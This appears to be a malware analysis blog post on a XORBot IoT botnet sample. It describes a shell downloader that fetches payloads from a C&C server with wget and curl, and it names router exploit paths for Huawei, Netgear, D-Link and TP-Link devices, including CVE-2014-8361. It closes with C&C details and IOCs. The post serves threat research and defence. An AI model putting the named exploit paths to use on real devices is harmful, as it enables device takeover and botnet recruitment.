Important elements of the analysis
- IoT botnet that targets several devices types
- Exploits with malicious remote commands
- Anti-detection capabilities and anti-detection bypass
- SH script malware spreading
- wget commands to download botnet artifacts from C&C IP Address
- chmod 777 command executions to manage the needed permissions
- ELF threat artifacts
- Exploit activities with dslf-config user
- kernel activities and CPU usage information and statistics obtaining
- VPS host C&C IP address
In the present article we analyze a XORBot malware sample. XORBot is an IoT botnet that targets devices with exploits and malicious remote commands, it provides anti-detection capabilities and detection bypass techniques. The threat comes with a spread SH script which downloads several botnet threats with wget commands that targets several devices types, which include Huawei, Netgear, D-Link, TP-Link.
The downloader malicious script begins with the declaration in the $PATH variable with the /usr/bin, /bin, /sbin, /usr/sbin, /usr/local/bin, /usr/local/sbin.
After the downloading operations with wget command the curl -O command is launched and the downloaded artifacts are saved in the /bin/busybox folder. The chmod 777 command is used to give all the needed permissions.
I downloaded one of the artifacts to inspect it:
The artifact is an ELF malware threat compiled with GCC GNU, Debian pre-release:
Here are the details about the ELF file sections and the bytes distribution:
The ELF file entropy is 6.04011, it doesn't seem packed:
Here we have several details about exploitation operations of Huawei and Netgear, GPON devices and routers, the useragent is set to wget/1.21.1. We can see also a reference to /picsdesc.xml which is related to CVE-2014-8361 vulnerability, so an arbitrary code execution flaw associated to Realtek.
Here we can see a GET request related to Netgear configuration device actions and references to /tmp/huawei folder, there is also a detail linked to an authorization of the user dslf-config, NTP server configurations setting with echo DEATH commands.
There is an evidence about privilege escalation through HNAP port to remote unauthenticated attackers related to D-Link devices associated to purenetworks[.]com domain:
GET requests below are associated to Netgear.cfg configuration file, the commands are used to wipe /tmp folder contents, download content through wget command with http:// protocol and %s string value variable and spim references to execute assemblies with MIPS32 execution types and open Netgear configuration attributes and parameters with currentsetting.htm page.
Here we have expoloits references to Huawei Home Gateway devices that use dslf-config user and with /ctrlt/DeviceUpgrade_1 URI
The evidences associated to commands related to GET requests to the URI /cgi-bin/luci are related to TP-Link devices exploitations. Some artifacts are obtained with GET requests to /.shell URIs.
The threat gets information about kernel activities and CPU usage, statistics:
By analyzing deeply the details about the C&C IP address used to download further botnet artifacts threats we see 66.63.187[.]192 has been registered in Germany by Virtualine Technologies, it is a VPS. The main opened ports are 22 (SSH), 80, 443, 1944.
ConnectWise Screenconnect RAT relations are highlighted to this VPS IP Address:
By analyzing other threat intelligence OSINT evidences we can see relations to UK registration country, associations to Bots, Zombies, Spam, Mirai C&C
The IP address in question is also related to Port Scan malicious activities:
The threat is recognized as malicious by OSINT sources and identified as BASH/Dloader.AAN!tr.dldr:
Here we can see several IDS rules that identify exploit attempts associated to GPON, Beetel Connection Manager username buffer overflow attempts, SHELLCODE and suspicious useragents:
IOCs:
- 21f62daa3b03e3e79f60193c5aa00c3f
- b82e95f5c68e8bd3a93098c6da1ae55129cd9103
- d8287773e46c4afe3e1a826fcdcbdb645a7bc217d9b3fcc2300c40511d743b4f
- 66.63.187[.]192
- purenetworks[.]com
- IQghrApWdD6m7nDBVyHppAP6McFaT1FrYh